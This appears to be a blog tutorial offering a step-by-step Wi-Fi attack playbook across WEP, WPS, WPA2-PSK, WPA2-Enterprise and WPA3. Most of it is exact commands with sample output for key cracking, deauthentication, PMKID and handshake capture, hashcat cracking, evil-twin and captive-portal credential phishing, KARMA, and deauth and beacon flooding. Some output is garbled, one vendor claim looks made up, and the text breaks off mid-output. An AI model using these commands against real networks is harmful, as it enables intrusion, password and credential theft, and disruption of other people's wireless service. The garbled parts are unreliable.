Status: Decrypted May 6, 2026

Wi-Fi hacking, every protocol, every attack

#WiFi #Wireless #WPA2 #WPA3 #Aircrack #Red Team #Pentest

Wi-Fi hacking, every protocol, every attack

This is the article I wish existed when I started doing wireless security assessments. Every guide I found covered one protocol, one attack, one tool. None of them gave the full picture. None of them showed what the terminal actually looks like when you run the commands. And none of them covered the techniques that came out of recent academic research and BlackHat presentations.

This article covers everything. WEP, WPA, WPA2-PSK, WPA2-Enterprise, WPA3-SAE, WPS, and the protocol-agnostic attacks that work regardless of encryption. For each one, I’ll explain the protocol internals, the attack methodology, the exact commands, and what the output looks like. I’ll also cover the techniques that most red teamers skip because they either don’t know about them or think they’re too complex.

Let’s get into it.

Prerequisites and setup

Hardware

You need a wireless adapter that supports monitor mode and packet injection. Not all adapters do. The chipset matters more than the brand.

Reliable chipsets for wireless auditing:

  • Mediatek MT7612U (Alfa AWUS036ACM): 2.4 GHz and 5 GHz, best current choice
  • Realtek RTL8812AU (Alfa AWUS036ACH): 2.4 GHz and 5 GHz, widely supported
  • Atheros AR9271 (Alfa AWUS036NHA): 2.4 GHz only, rock solid for legacy attacks
  • Ralink RT3070 (Alfa AWUS036NH): 2.4 GHz, older but still works

I use the AWUS036ACM for most engagements. It handles both bands, injection works out of the box on Kali, and it’s small enough to carry in a laptop bag without looking suspicious.

Software

Everything runs on Kali Linux. The tools we’ll use:

sudo apt update
sudo apt install -y aircrack-ng hashcat hcxdumptool hcxpcapngtool \
  hostapd-wpe freeradius bettercap mdk4 wifite2 reaver bully \
  pixiewps eaphammer cowpatty asleap john wireshark tshark

Putting the adapter in monitor mode

Before anything else, we need to switch the adapter from managed mode (normal WiFi client) to monitor mode (passive packet capture and injection).

# Check interface name
iwconfig
wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Frequency:2.437 GHz  Access Point: Not-Associated
          Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
# Kill interfering processes
sudo airmon-ng check kill
Killing these processes:

    PID Name
    723 wpa_supplicant
    814 NetworkManager
# Enable monitor mode
sudo airmon-ng start wlan0
PHY     Interface       Driver          Chipset

phy0    wlan0           mt76x2u         Mediatek Technology

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

Your interface is now wlan0mon. Let’s start scanning.

sudo airodump-ng wlan0mon
 CH  6 ][ Elapsed: 12 s ][ 2026-05-06 14:23

 BSSID              PWR  Beacons  #Data  #/s  CH  MB   ENC  CIPHER AUTH ESSID

 AA:BB:CC:DD:EE:01  -42      127     84   12   6  54e  WPA2 CCMP   PSK  HomeNetwork
 AA:BB:CC:DD:EE:02  -58       89     23    3   1  54e  WPA2 CCMP   PSK  CafeWiFi
 AA:BB:CC:DD:EE:03  -61       45      0    0  11  54e  WPA3 CCMP   SAE  SecureOffice
 AA:BB:CC:DD:EE:04  -35      201    412   45   6  54e  WPA2 CCMP   MGT  CorpNetwork
 AA:BB:CC:DD:EE:05  -72       34     12    1   3  54e  WEP  WEP        LegacyPrinter
 AA:BB:CC:DD:EE:06  -55       98     67    8   6  54e  WPA2 CCMP   PSK  Neighbor_5G

 BSSID              STATION            PWR   Rate    Lost  Frames  Notes  Probes

 AA:BB:CC:DD:EE:01  11:22:33:44:55:01  -38    1e- 1      0      47         HomeNetwork
 AA:BB:CC:DD:EE:01  11:22:33:44:55:02  -51    1e- 6      0      23
 AA:BB:CC:DD:EE:04  11:22:33:44:55:03  -44   11e-11      0     189         CorpNetwork

This single screen tells you everything: which networks exist, their encryption, their channel, signal strength, and which clients are connected. The ENC column is your attack selector. Let’s go protocol by protocol.

WEP (Wired Equivalent Privacy)

WEP is dead. It has been dead since 2004. But it still exists in the wild, usually on old printers, industrial equipment, or embedded systems that never got updated. If you see WEP during an engagement, it’s a guaranteed win.

Why WEP is broken

WEP uses RC4 stream cipher with a 24-bit Initialization Vector (IV). The IV is sent in cleartext with every frame. Since the IV space is only 2^24 (16.7 million), IVs repeat quickly on busy networks. When two frames share the same IV, the XOR of their plaintexts can be recovered. But it’s worse than that: certain weak IVs (Fluhrer-Mantin-Shamir attack) directly leak bytes of the key. With enough captured IVs, the key is mathematically recoverable.

The attack

Step 1: Capture traffic on the target channel.

sudo airodump-ng -c 3 --bssid AA:BB:CC:DD:EE:05 -w wep_capture wlan0mon
 CH  3 ][ Elapsed: 2 mins ][ 2026-05-06 14:25

 BSSID              PWR RXQ Beacons  #Data  #/s  CH  MB   ENC  CIPHER AUTH ESSID

 AA:BB:CC:DD:EE:05  -72  84     312    847    6   3  54   WEP  WEP        LegacyPrinter

 BSSID              STATION            PWR   Rate    Lost  Frames  Notes  Probes

 AA:BB:CC:DD:EE:05  11:22:33:44:55:04  -65    1- 1      0     134

We need around 20,000 to 40,000 IVs to crack the key. If the network is quiet, that could take hours. We can speed this up.

Step 2: ARP replay attack to generate traffic.

# Associate with the AP first (needed for injection)
sudo aireplay-ng -1 0 -a AA:BB:CC:DD:EE:05 wlan0mon
14:26:03  Sending Authentication Request (Open System) [ACK]
14:26:03  Authentication successful
14:26:03  Sending Association Request [ACK]
14:26:03  Association successful :-) (AID: 1)
# Start ARP replay
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:05 wlan0mon
14:26:18  Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE:05) on channel 3
Saving ARP requests in replay_arp-0506-142618.cap
You should also start airodump-ng to capture replies.
Read 4832 packets (got 127 ARP requests and 98 ACKs), sent 4271 packets...(499 pps)

Watch the #Data column in airodump-ng climb. Once you hit 20,000+ IVs, crack it.

Step 3: Crack the key.

sudo aircrack-ng wep_capture-01.cap
Opening wep_capture-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 43271 ivs.
                            KEY FOUND! [ 41:42:43:44:45 ]
Decrypted correctly: 100%

Total time from start to key: usually under 5 minutes on an active network. The key 41:42:43:44:45 is the ASCII representation of “ABCDE”. WEP is that broken.

The faster method: Chopchop / Fragmentation

If there’s zero traffic on the network (no ARP frames to replay), use the chopchop or fragmentation attack to forge packets from scratch.

# Fragmentation attack: recover PRGA (keystream)
sudo aireplay-ng -5 -b AA:BB:CC:DD:EE:05 wlan0mon
14:28:41  Waiting for a data packet...
Read 97 packets...

        Size: 86, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  AA:BB:CC:DD:EE:05
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  11:22:33:44:55:04

Use this packet ? y

Saving chosen packet in replay_src-0506-142841.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Saving keystream in fragment-0506-142843.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
# Forge an ARP request using the recovered keystream
sudo packetforge-ng -0 -a AA:BB:CC:DD:EE:05 -h 11:22:33:44:55:04 \
  -l 255.255.255.255 -k 255.255.255.255 -y fragment-0506-142843.xor -w forged_arp.cap
# Replay the forged ARP to generate IVs
sudo aireplay-ng -2 -r forged_arp.cap wlan0mon

This generates massive amounts of traffic even on a silent network. IVs accumulate fast, and you crack the key the same way.

WPS (Wi-Fi Protected Setup)

WPS was designed to make WiFi setup easier. It introduced a PIN-based authentication mechanism that is fundamentally flawed.

Why WPS is broken

The WPS PIN is 8 digits, but the last digit is a checksum, so it’s really 7 digits. But it gets worse: the protocol verifies the PIN in two halves. The first half (4 digits, 10,000 possibilities) is verified separately from the second half (3 digits, 1,000 possibilities). This means you only need 11,000 attempts maximum instead of 10,000,000. At one attempt per second, that’s about 3 hours.

And then there’s Pixie Dust.

Pixie Dust attack (offline, seconds)

Some router chipsets (Ralink, Broadcom, Realtek) use predictable or weak random number generation for the E-S1 and E-S2 nonces during the WPS exchange. If the nonces are predictable, the PIN can be recovered from a single exchange without brute-forcing. This takes seconds.

# Check if the target has WPS enabled
sudo wash -i wlan0mon
BSSID              Ch  dBm  WPS  Lck  Vendor    ESSID
AA:BB:CC:DD:EE:01   6  -42  2.0  No   RalinkTe  HomeNetwork
AA:BB:CC:DD:EE:02   1  -58  2.0  No   Broadcom  CafeWiFi

The Lck column shows if WPS is locked (rate-limited). No means we can try.

# Pixie Dust attack with reaver
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:01 -c 6 -K 1 -vv
[+] Waiting for beacon from AA:BB:CC:DD:EE:01
[+] Received beacon from AA:BB:CC:DD:EE:01
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with AA:BB:CC:DD:EE:01 (ESSID: HomeNetwork)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending M8 message
[+] Received WSC NACK
[+] WPS PIN: '23456789'
[+] WPA PSK: 'MySuperSecretPassword123'
[+] AP SSID: 'HomeNetwork'

Pixie Dust recovered the WPS PIN and the WPA password in under 30 seconds. No brute-force, no handshake capture, no dictionary.

Bully is an alternative to reaver that handles some edge cases better:

sudo bully wlan0mon -b AA:BB:CC:DD:EE:01 -c 6 -d -v 3

Online PIN brute-force (when Pixie Dust fails)

If the chipset isn’t vulnerable to Pixie Dust, fall back to online brute-force:

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:01 -c 6 -d 1 -vv

The -d 1 flag adds a 1-second delay between attempts to avoid lockout. Most routers lock WPS after 3 failed attempts and require a cooldown period. Some lock permanently until reboot.

On routers that implement lockout, mdk4 can be used to continuously deauth the AP, causing it to reboot and reset the WPS lockout counter. This is noisy and not subtle.

# In a separate terminal: keep the AP cycling
sudo mdk4 wlan0mon d -B AA:BB:CC:DD:EE:01

WPS is still enabled by default on a staggering number of consumer routers in 2026. Even when the user sets a strong WPA2 password, WPS provides a trivially exploitable backdoor. The first thing I check on any wireless engagement is WPS status. It’s often the shortest path.

WPA/WPA2-PSK (Pre-Shared Key)

This is the most common encryption you’ll encounter. WPA2-PSK uses a 4-way handshake based on the Pre-Shared Key (PSK) and the SSID to derive session keys. The attack is always the same: capture the handshake, crack it offline.

But there are multiple ways to get that handshake, and the method matters.

Method 1: Classic handshake capture with deauthentication

Step 1: Target the network and capture.

sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:01 -w wpa_capture wlan0mon

We need a client to connect (or reconnect) to capture the 4-way handshake. We can force a reconnection by deauthenticating an existing client.

Step 2: Deauth a client.

In a separate terminal:

sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:01 -c 11:22:33:44:55:01 wlan0mon
14:35:18  Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE:01) on channel 6
14:35:18  Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:01] [ 5|62 ACKs]
14:35:19  Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:01] [13|63 ACKs]
14:35:20  Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:01] [ 0|62 ACKs]
14:35:21  Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:01] [ 4|65 ACKs]
14:35:22  Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:01] [ 7|61 ACKs]

Back in airodump-ng, you’ll see:

 CH  6 ][ Elapsed: 3 mins ][ 2026-05-06 14:35 ][ WPA handshake: AA:BB:CC:DD:EE:01

 BSSID              PWR RXQ Beacons  #Data  #/s  CH  MB   ENC  CIPHER AUTH ESSID

 AA:BB:CC:DD:EE:01  -42  91     587   1204   18   6  54e  WPA2 CCMP   PSK  HomeNetwork

The WPA handshake: AA:BB:CC:DD:EE:01 in the top right confirms capture.

Step 3: Crack with aircrack-ng (dictionary attack).

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_capture-01.cap
Opening wpa_capture-01.cap
Read 18241 packets.

   #  BSSID              ESSID               Encryption  1st Handshake

   1  AA:BB:CC:DD:EE:01  HomeNetwork         WPA (1 handshake)

Choosing first network as target.

Opening wpa_capture-01.cap
Reading packets, please wait...

                               Aircrack-ng 1.7

      [00:01:24] 384932/14344391 keys tested (4527.14 k/s)

      Time left: 51 minutes, 12 seconds                          2.68%

                         KEY FOUND! [ sunshine2024 ]

      Master Key     : 7A 3C D1 ... (32 bytes)

      Transient Key  : B4 19 E2 ... (64 bytes)

      EAPOL HMAC     : 91 C0 3F ... (16 bytes)

aircrack-ng cracks on CPU. It’s slow. For serious cracking, use hashcat on GPU.

Step 3b: Crack with hashcat (GPU).

First, convert the capture to hashcat format:

# Convert .cap to .hc22000 (hashcat format)
hcxpcapngtool -o hash.hc22000 wpa_capture-01.cap
summary capture file:
---------------------
file name................................: wpa_capture-01.cap
file type................................: pcap
file size................................: 48271 bytes
packets inside...........................: 327
EAPOL pairs (best).......................: 1
EAPOL pairs written to hash.hc22000.....: 1
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 CUDA) - Platform #1 [NVIDIA Corporation]
* Device #1: NVIDIA GeForce RTX 4090, 24176/24564 MB, 128MCU

hash.hc22000:0506...long hash...:HomeNetwork

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: hash.hc22000
Time.Started.....: Thu May  6 14:42:13 2026
Time.Estimated...: Thu May  6 14:42:28 2026
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   952.3 kH/s (7.12ms) @ Accel:32 Loops:128 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14344391/14344391 (100.00%)

0506...long hash...:sunshine2024

An RTX 4090 does about 950,000 WPA2 hashes per second. Rockyou (14 million passwords) in about 15 seconds. For more serious attacks, use larger wordlists (Crackstation, WeakPass) or rule-based attacks.

Hashcat rule-based attack (for when dictionaries fail):

hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule

This applies 64 transformation rules to each word: capitalize, append numbers, leet speak, reverse. Multiplies your wordlist by 64x.

Hashcat mask attack (brute-force with pattern):

# 8-digit numeric password
hashcat -m 22000 hash.hc22000 -a 3 '?d?d?d?d?d?d?d?d'

# "Name" + 4 digits
hashcat -m 22000 hash.hc22000 -a 3 '?u?l?l?l?l?d?d?d?d'

Method 2: PMKID attack (no client needed)

This is the technique that changed everything when it was published by Jens “atom” Steube (the hashcat author) in 2018. It captures a PMKID hash from the AP’s first message in the 4-way handshake. The critical advantage: you don’t need a connected client. You don’t need to deauth anyone. You just need to send an association request to the AP and grab the PMKID from the response.

The PMKID is calculated as: PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA). Since the PMK is derived from the PSK and SSID, you can verify password guesses offline.

sudo hcxdumptool -i wlan0mon -o pmkid_capture.pcapng --filtermode=2 \
  --filterlist_ap=AABBCCDDEEF1 --enable_status=3
start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0mon
FILTERLIST_AP............: 1 MAC(s)
MAC CLIENT...............: a]8c2e1f4d79 (sniffed)
MAC ACCESS POINT.........: aabbccddeef1
ESSID....................: HomeNetwork
PMKID....................: 2a9c3e7f1b4d8a5c0e6f2b7d9a1c3e5f
MESSAGE PAIR.............: M1M2 PMKID, EAPOL

INFO: cha]pturing, 1 PMKID(s) found so far
# Convert to hashcat format
hcxpcapngtool -o pmkid.hc22000 pmkid_capture.pcapng
summary capture file:
---------------------
file name................................: pmkid_capture.pcapng
PMKID(s) (best).........................: 1
PMKID(s) written to pmkid.hc22000.......: 1
# Crack it exactly like a handshake
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt

Same cracking speed, same result. But you never had to deauth anyone. On stealth engagements, this is the preferred method.

Not all APs send the PMKID in their first message. It depends on the implementation. In my experience, about 60-70% of consumer routers respond with a PMKID. Enterprise APs and newer firmwares sometimes don’t. But when it works, it’s the cleanest attack available.

Method 3: Passive handshake capture (zero interaction)

If you have time and patience, you don’t need to deauth anyone at all. Just sit and wait for a client to connect naturally. In an office environment, phones reconnect constantly (employees arriving in the morning, phones coming back from sleep, roaming between APs).

sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:01 -w passive_capture wlan0mon

Leave it running. On a busy network, you’ll capture a handshake within 15 to 30 minutes. On a quiet network, it might take hours. But the advantage is that you generate zero anomalous traffic. No deauth frames, no association requests, nothing in the logs.

The ESSID gotcha

Something that most guides forget to mention: WPA2-PSK derives the PMK from the PSK and the SSID. This means the same password on different SSIDs produces a different PMK. It also means precomputed hash tables (rainbow tables) must be generated per-SSID.

For common SSIDs like “linksys”, “NETGEAR”, “default”, precomputed tables exist and can crack passwords nearly instantly. For unique SSIDs, you’re stuck with runtime cracking.

# Generate a PMK database for a specific SSID (for faster future cracks)
genpmk -f /usr/share/wordlists/rockyou.txt -d pmk_HomeNetwork.db -s "HomeNetwork"
# Use the precomputed PMKs with cowpatty
cowpatty -d pmk_HomeNetwork.db -r wpa_capture-01.cap -s "HomeNetwork"

WPA2-Enterprise (802.1X / EAP)

WPA2-Enterprise doesn’t use a shared password. Instead, each user authenticates individually via 802.1X using a RADIUS server. The common EAP methods are:

  • EAP-PEAP/MSCHAPv2: Username + password inside a TLS tunnel
  • EAP-TTLS: Similar to PEAP, different outer protocol
  • EAP-TLS: Client certificate authentication (the hardest to attack)

The attack surface here is different. We’re not cracking a PSK. We’re setting up a rogue AP that impersonates the corporate network and captures user credentials when they connect.

Evil Twin against PEAP/MSCHAPv2

The classic attack. We create a fake AP with the same SSID as the target, present a fake RADIUS server, and capture the MSCHAPv2 challenge/response when clients connect.

Step 1: Set up the rogue AP with hostapd-wpe.

# Edit the configuration
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf

Key settings to change:

interface=wlan0mon
ssid=CorpNetwork
channel=6
wpa=2
wpa_pairwise=CCMP
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
Using interface wlan0mon with hwaddr aa:bb:cc:dd:ee:ff and ssid "CorpNetwork"
wlan0mon: interface state UNINITIALIZED->ENABLED
wlan0mon: AP-ENABLED

Step 2: Deauth clients from the real AP to force them to our rogue AP.

sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:04 wlan0mon

When a client reconnects and our rogue AP has a stronger signal (or the real AP is being deauthed), the client will connect to us. In the hostapd-wpe output:

wlan0mon: STA 11:22:33:44:55:03 IEEE 802.11: authenticated
wlan0mon: STA 11:22:33:44:55:03 IEEE 802.11: associated (aid 1)

mschapv2: Mon May 06 14:55:02 2026
     username:      jsmith
     challenge:     a1:b2:c3:d4:e5:f6:a7:b8
     response:      1a:2b:3c:4d:5e:6f:7a:8b:9c:0d:1e:2f:3a:4b:5c:6d:7e:8f:9a:0b:1c:2d:3e:4f
     jtr NETNTLM:   jsmith:$NETNTLM$a1b2c3d4e5f6a7b8$1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f
     hashcat NETNTLM: jsmith::::1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f:a1b2c3d4e5f6a7b8

Step 3: Crack the MSCHAPv2 hash.

hashcat -m 5500 jsmith::::1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f:a1b2c3d4e5f6a7b8 \
  /usr/share/wordlists/rockyou.txt

MSCHAPv2 is based on DES and cracks extremely fast on GPU. An RTX 4090 can do around 75 billion NTLMv1/MSCHAPv2 hashes per second. Any password under 14 characters that’s based on dictionary words will fall in minutes.

EAPHammer (the easier way)

eaphammer automates the entire evil twin process for WPA2-Enterprise:

sudo eaphammer --bssid AA:BB:CC:DD:EE:04 --essid "CorpNetwork" --channel 6 \
  --interface wlan0mon --auth wpa-eap --creds

It handles the certificate generation, RADIUS configuration, and credential capture automatically. The captured credentials are written to a log file in the same hashcat-ready format.

The certificate problem

Here’s the thing that most red teamers don’t realize: the evil twin attack only works because most clients don’t properly validate the RADIUS server’s certificate. On Windows, when a client connects to a PEAP network for the first time, it shows a certificate warning. Most users click “Connect” without reading it. On Android, many versions don’t even show a warning.

However, if the organization has properly configured certificate pinning via GPO (Windows) or MDM (mobile), the evil twin attack fails. The client will refuse to connect because our self-signed certificate doesn’t match the pinned certificate.

The technique that bypasses this: GTC downgrade. Instead of MSCHAPv2 inside the PEAP tunnel, we negotiate EAP-GTC (Generic Token Card), which sends the password in plaintext. Some supplicants accept this downgrade silently.

sudo eaphammer --bssid AA:BB:CC:DD:EE:04 --essid "CorpNetwork" --channel 6 \
  --interface wlan0mon --auth wpa-eap --creds --negotiate GTC

If the client accepts GTC, the password arrives in cleartext. No cracking needed.

WPA3-SAE (Simultaneous Authentication of Equals)

WPA3 was supposed to fix everything. It replaces the 4-way handshake with SAE (Simultaneous Authentication of Equals), based on the Dragonfly key exchange. SAE provides forward secrecy and is resistant to offline dictionary attacks. In theory.

Dragonblood (CVE-2019-9494, CVE-2019-9496)

In 2019, Mathy Vanhoef and Eyal Ronen published Dragonblood, a set of attacks against WPA3-SAE. The attacks exploit implementation flaws in the Dragonfly handshake.

Side-channel attack (timing/cache):

The SAE handshake involves converting the password to a point on an elliptic curve using a hash-to-curve algorithm. This process involves a loop that runs a variable number of iterations depending on the password. By measuring the timing of the AP’s response, an attacker can infer information about the password and reduce the search space for an offline attack.

This is an academic attack. It requires precise timing measurements and is difficult in practice over WiFi due to jitter. But it works in controlled environments.

Transition mode downgrade:

Most WPA3 deployments use “transition mode” to maintain backward compatibility with WPA2 clients. In this mode, the AP advertises both WPA2 and WPA3. An attacker can force a client to connect using WPA2 by deauthing it and presenting a rogue AP that only advertises WPA2.

# Check if the AP supports transition mode
# Look for both WPA2 and WPA3 in the same BSSID beacon
sudo airodump-ng wlan0mon --wps

If the AP is in transition mode:

  1. Capture the WPA2 handshake (classic deauth method)
  2. Crack it offline as normal WPA2

The WPA3 security is entirely negated by transition mode. This is why the Wi-Fi Alliance recommends “WPA3-only mode” for sensitive networks. Almost nobody uses it because it breaks older devices.

SAE authentication flood DoS:

The SAE handshake is computationally expensive for the AP (elliptic curve operations). Sending a flood of SAE commit messages can overwhelm the AP’s CPU.

# Using mdk4 for SAE authentication flood
sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:03 -m

This isn’t a key recovery attack, but it’s a denial of service that can force the AP to reboot or degrade to WPA2 transition mode.

WPA3 in practice

In 2026, pure WPA3-SAE networks (no transition mode) are genuinely hard to attack remotely. The timing side-channel requires lab conditions. Without transition mode, there’s no downgrade path. And PMKID doesn’t work against SAE.

The realistic attack path against WPA3-only networks is social engineering (evil twin with a captive portal that phishes the password) or targeting the clients rather than the AP (KARMA attack to capture probe requests).

WPA3 is the first WiFi encryption where the protocol itself isn’t the weak link. The weak link is the people and the transition period. Most networks will run transition mode for years, making WPA3 security purely theoretical.

Protocol-agnostic attacks

These attacks work regardless of the encryption type. They target the WiFi protocol itself (802.11 management frames) or the clients.

KARMA / Known Beacons attack

WiFi clients constantly broadcast “probe requests” looking for networks they’ve previously connected to. KARMA responds to all probe requests with a “Yes, I’m that network” regardless of what SSID was asked for. This tricks clients into connecting to your rogue AP.

# Using bettercap for KARMA
sudo bettercap -iface wlan0mon
» wifi.recon on
» wifi.ap
» set wifi.ap.ssid "Free_WiFi"
» set wifi.ap.channel 6
» set wifi.ap.encryption false
» wifi.recon.channel 6
» set ticker.commands "wifi.show; wifi.deauth all"
» ticker on

Or with hostapd in KARMA mode:

# hostapd-mana (KARMA-capable fork of hostapd)
sudo hostapd-mana /etc/hostapd-mana/hostapd-mana.conf

With KARMA, you don’t target a specific network. You become whatever network the client is looking for. Once they connect, you’re the gateway. MITM, credential capture, DNS hijacking, everything is on the table.

Evil Twin with captive portal

When WPA2 cracking fails (strong password, no WPS), the captive portal approach often succeeds. You create a rogue AP with the same SSID, deauth clients from the real AP, and when they connect to yours, present a fake login page that captures the WiFi password.

# wifiphisher automates this entire flow
sudo wifiphisher -aI wlan0mon -eI wlan1 -p firmware-upgrade
[*] Starting Wifiphisher 1.4GIT
[+] Selecting wlan0mon as the deauth interface and wlan1 as the rogue AP interface
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting firmware-upgrade scenario
[*] Starting the fake AP (ESSID: HomeNetwork) on channel 6
[*] Deauthenticating clients from target AP...
[+] Victim 11:22:33:44:55:01 connected to rogue AP
[+] Victim requested captive portal page
[+] POST request with WPA password: sunshine2024

The victim sees what looks like a router firmware upgrade page asking them to re-enter their WiFi password. Social engineering, but it works frighteningly well.

Deauthentication and disassociation flood

Pure denial of service. Deauth frames in 802.11 are unencrypted and unauthenticated (pre-802.11w). Any device can send them.

# Deauth all clients from all APs on a channel
sudo mdk4 wlan0mon d

# Target a specific AP
sudo mdk4 wlan0mon d -B AA:BB:CC:DD:EE:01

# Target a specific client
sudo mdk4 wlan0mon d -S 11:22:33:44:55:01

802.11w (Management Frame Protection / PMF) was designed to fix this by encrypting management frames. It’s mandatory in WPA3 but optional (and rarely enabled) in WPA2. If PMF is enabled, deauth attacks don’t work.

Beacon flood

Create thousands of fake access points to confuse clients and make the WiFi environment unusable.

sudo mdk4 wlan0mon b -f ssid_list.txt -c 6

Where ssid_list.txt contains one SSID per line. mdk4 will broadcast beacons for all of them simultaneously. On a phone scanning for WiFi, the user will see hundreds of networks appear.

Advanced techniques

These are the techniques that come from academic research, BlackHat presentations, and tools that most people don’t know exist.

KRACK (Key Reinstallation Attacks)

Published by Mathy Vanhoef at CCS 2017 and presented at BlackHat Europe 2017. KRACK exploits a flaw in the WPA2 4-way handshake itself. By replaying message 3 of the handshake, an attacker can force the client to reinstall an already-in-use encryption key, resetting the nonce counter. This allows frame decryption and in some cases (Linux/Android with wpa_supplicant 2.4/2.5) an all-zero encryption key.

The attack requires a man-in-the-middle position between the client and AP, achieved through channel-based MITM:

  1. Clone the target AP on a different channel
  2. Use a multi-channel MITM tool (krackattack scripts) to forward frames between channels
  3. Intercept and replay message 3 of the 4-way handshake
  4. Capture decrypted frames
# Vanhoef's original scripts
cd krackattack
sudo ./krack-all-zero-tk.py wlan0mon wlan1mon

Most devices have been patched, but the patch requires a client-side update. IoT devices, smart TVs, and embedded systems are often not updated. The attack is complex to set up but remains relevant against unpatched devices.

FragAttacks (Fragmentation and Aggregation Attacks)

Also by Vanhoef, presented at USENIX Security 2021. FragAttacks exploit design flaws in the WiFi standard’s frame fragmentation and aggregation mechanisms. The attacks affect every WiFi device ever made (WEP, WPA, WPA2, WPA3).

Three classes of vulnerabilities:

  1. Aggregation attack: An attacker can flip the “is aggregated” flag on an encrypted frame, causing the receiver to parse the frame as A-MSDU (aggregated) instead of normal. This lets the attacker inject arbitrary network packets.

  2. Mixed key attack: Some implementations accept fragments encrypted with different keys, allowing the attacker to mix legitimate and malicious fragments.

  3. Fragment cache attack: Some implementations don’t clear fragment caches when connecting to a new network, allowing fragments from one network to be combined with fragments from another.

Vanhoef’s tool for testing:

cd fragattacks
sudo ./fragattack.py wlan0mon --ap test-amsdu-injection

WiFi Krøøk (CVE-2019-15126)

Discovered by ESET researchers and presented at RSA Conference 2020. After a deauthentication, some Broadcom and Cypress WiFi chipsets transmit buffered frames encrypted with an all-zero session key (TK). An attacker can capture these frames and decrypt them trivially.

The attack is simple:

  1. Send a deauth frame to the target
  2. Capture the frames transmitted immediately after (during the disassociation)
  3. These frames are encrypted with TK=0, so decryption is trivial

The vulnerability was in the chip firmware, not the protocol. Broadcom (now Broadspring) and Cypress patched it, but billions of devices with these chipsets may never receive firmware updates.

Multi-channel MITM (MC-MitM)

The core technique behind several advanced attacks (KRACK, FragAttacks). Instead of being on the same channel as the client and AP, you operate on two channels simultaneously:

  1. Clone the target AP on a different channel
  2. Use CSA (Channel Switch Announcement) beacons to force the client to move to your channel
  3. Forward all frames between the client and the real AP on the other channel
  4. You’re now a transparent MITM, able to modify, drop, or inject frames
# Example using Vanhoef's mc-mitm tool
sudo ./mc-mitm.py --target AA:BB:CC:DD:EE:01 --intf wlan0mon --dump

This is the foundation for many protocol-level attacks. It’s complex to set up reliably (timing and frame forwarding must be precise), but it gives you full control over the encrypted WiFi traffic.

ACK timing side-channel

Published at WiSec 2023. When you send a frame to a WiFi client, the client responds with an ACK frame after a fixed SIFS (Short Interframe Space) delay. But the processing time before the ACK varies slightly depending on the frame content and the client’s state. By measuring ACK timing with microsecond precision, an attacker can infer information about encrypted frame contents.

This is a research-stage attack. It requires custom hardware (SDR) for precise timing measurements. But it demonstrates that even encrypted WiFi leaks information through timing.

802.11r (Fast BSS Transition) exploitation

802.11r enables fast roaming between APs in enterprise networks. A flaw in the protocol allows an attacker to replay the FT Authentication Response to reinstall the pairwise key, similar to KRACK but targeting the roaming mechanism.

During a wireless assessment of a large enterprise with multiple APs:

# Monitor for FT authentication frames
sudo tshark -i wlan0mon -f "wlan type mgt subtype auth" -Y "wlan.fixed.auth.alg == 2"

If you see FT authentication exchanges, the network uses 802.11r and may be vulnerable if unpatched. The attack vector is the same as KRACK: channel-based MITM and replay of the FT handshake.

Automated tools that chain everything

For engagements where speed matters more than stealth, these tools automate the entire workflow.

wifite2

sudo wifite --kill -i wlan0mon
   .               .
 .´  ·  .     .  ·  `.
 :  :  :  (¯)  :  :  :
  `.  ·  ` /\ ´  ·  .´
    `     //\\     ´
   ____  //  \\ ____
  |    |/`    `\|    |     wifite2 2.7.0
  |    |        |    |
  |____|        |____|

 [+] scanning (mon0)...

